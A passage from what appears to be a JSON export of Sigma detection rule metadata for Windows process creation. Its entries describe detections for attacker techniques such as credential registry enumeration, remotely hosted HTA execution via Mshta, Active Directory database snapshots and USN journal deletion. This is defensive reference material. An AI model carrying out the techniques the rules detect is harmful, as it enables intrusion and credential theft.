\"gpg.exe\" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-06", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_gpg4win_portable_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md", "https://securelist.com/locked-out/68960/", "https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "77df53a5-1d78-4f32-bc5a-0e7465bd8f41", "value": "Portable Gpg.EXE Execution" }, { "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "value": "Use of VSIISExeLauncher.exe" }, { "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml" ], "tags": [ "attack.credential-access", "attack.t1552.002" ] }, "related": [ { "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", "value": "Enumeration for 3rd Party Creds From CLI" }, { "description": "Detects execution of \"curl.exe\" with the \"insecure\" flag over proxy or DOH.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Access to badly maintained internal or development systems" ], "filename": "proc_creation_win_curl_insecure_porxy_or_doh.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2c1486f5-02e8-4f86-9099-b97f2da4ed77", "value": "Insecure Proxy/DOH Transfer Via Curl.EXE" }, { "description": "Detects encoded base64 MZ header in the commandline", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_inline_base64_mz_header.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml" ], "tags": [ "attack.execution" ] }, "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "value": "Base64 MZ Header In CommandLine" }, { "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regedit_import_keys_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", "value": "Imports Registry Key From an ADS" }, { "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", "meta": { "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "creation_date": "2017-06-12", "falsepositive": [ "Legitimate administrative tasks" ], "filename": "proc_creation_win_sysinternals_psexesvc.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml" ], "tags": [ "attack.execution" ] }, "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "value": "PsExec Service Execution" }, { "description": "Detects the export of a crital Registry key to a file.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "filename": "proc_creation_win_regedit_export_critical_keys.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ "attack.exfiltration", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", "value": "Exports Critical Registry Keys To a File" }, { "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", "meta": { "author": "Austin Songer (@austinsonger)", "creation_date": "2021-10-21", "falsepositive": [ "Legitimate usage of stordiag.exe." ], "filename": "proc_creation_win_stordiag_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/eral4m/status/1451112385041911809", "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "value": "Execution via stordiag.exe" }, { "description": "Detects command line parameters or strings often used by crypto miners", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Legitimate use of crypto miners", "Some build frameworks" ], "filename": "proc_creation_win_susp_crypto_mining_monero.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crypto_mining_monero.yml" ], "tags": [ "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "value": "Potential Crypto Mining Activity" }, { "description": "Detect the use of processes with no name (\".exe\"), which can be used to evade Image-based detections.", "meta": { "author": "Matt Anderson (Huntress)", "creation_date": "2024-07-23", "falsepositive": [ "Rare legitimate software." ], "filename": "proc_creation_win_susp_no_image_name.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_no_image_name.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f208d6d8-d83a-4c2c-960d-877c37da84e5", "value": "Process Launched Without Image Name" }, { "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", "meta": { "author": "Alfie Champion (ajpc500)", "creation_date": "2021-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "value": "HackTool - F-Secure C3 Load by Rundll32" }, { "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-08-07", "falsepositive": [ "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)", "https://twitter.com/frack113/status/1555830623633375232", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", "value": "Use Short Name Path in Image" }, { "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "37e8d358-6408-4853-82f4-98333fca7014", "value": "Remote Access Tool - NetSupport Execution From Unusual Location" }, { "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dumpminitool_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", "value": "Suspicious DumpMinitool Execution" }, { "description": "Detects SILENTTRINITY stager use via PE metadata", "meta": { "author": "Aleksey Potapov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_silenttrinity_stager.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/SILENTTRINITY", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml" ], "tags": [ "attack.command-and-control", "attack.t1071" ] }, "related": [ { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", "value": "HackTool - SILENTTRINITY Stager Execution" }, { "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-16", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_win_reg_software_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", "https://github.com/harleyQu1nn/AggressorScripts", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518" ] }, "related": [ { "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", "value": "Detected Windows Software Discovery" }, { "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_customshellhost.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/", "https://github.com/LOLBAS-Project/LOLBAS/pull/180", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", "value": "Suspicious CustomShellHost Execution" }, { "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mshta_http.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.005" ] }, "related": [ { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", "value": "Remotely Hosted HTA File Executed Via Mshta.EXE" }, { "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-04", "falsepositive": [ "Command lines that use the same flags" ], "filename": "proc_creation_win_createdump_lolbin_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://twitter.com/bopin2020/status/1366400799199272960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "value": "CreateDump Process Dump" }, { "description": "Detects uncommon child process of Setres.EXE.\nSetres.EXE is a Windows server only process and tool that can be used to set the screen resolution.\nIt can potentially be abused in order to launch any arbitrary file with a name containing the word \"choice\" from the current execution path.\n", "meta": { "author": "@gott_cyber, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-11", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_setres_uncommon_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Setres/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", "https://twitter.com/0gtweet/status/1583356502340870144", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setres_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "value": "Uncommon Child Process Of Setres.EXE" }, { "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-29", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_powertool.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "value": "HackTool - PowerTool Execution" }, { "description": "Detects nltest commands that can be used for information discovery", "meta": { "author": "Craig Young, oscd.community, Georg Lauenstein", "creation_date": "2021-07-24", "falsepositive": [ "Legitimate administration use but user and host must be investigated" ], "filename": "proc_creation_win_nltest_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ "attack.discovery", "attack.t1016", "attack.t1482" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "value": "Potential Recon Activity Via Nltest.EXE" }, { "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", "meta": { "author": "Avneet Singh @v3t0_, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_tracker.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055.001" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", "value": "Potential DLL Injection Or Execution Using Tracker.exe" }, { "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ef61af62-bc74-4f58-b49b-626448227652", "value": "Suspicious Active Directory Database Snapshot Via ADExplorer" }, { "description": "Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.\n", "meta": { "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-11-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_system_exe_anomaly.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/GelosSnake/status/934900723426439170", "https://asec.ahnlab.com/en/39828/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "value": "System File Execution Location Anomaly" }, { "description": "Detects the import of the specified file to the registry with regedit.exe.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Legitimate import of keys", "Evernote" ], "filename": "proc_creation_win_regedit_import_keys.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", "value": "Imports Registry Key From a File" }, { "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-11", "falsepositive": [ "Administrative activity", "Software installation" ], "filename": "proc_creation_win_schtasks_creation_temp_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "value": "Suspicious Scheduled Task Creation Involving Temp Folder" }, { "description": "Detects a tscon.exe start as LOCAL SYSTEM", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_tscon_localsystem.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9847f263-4a81-424f-970c-875dab15b79b", "value": "Suspicious TSCON Start as SYSTEM" }, { "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", "meta": { "author": "Ecco, E.M. Anhaus, oscd.community", "creation_date": "2019-09-26", "falsepositive": [ "Admin activity", "Scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_fsutil_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", "https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt", "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1070", "attack.t1485" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "add64136-62e5-48ea-807e-88638d02df1e", "value": "Fsutil Suspicious Invocation" }, { "description": "Detects execution of \"reg.exe\" to 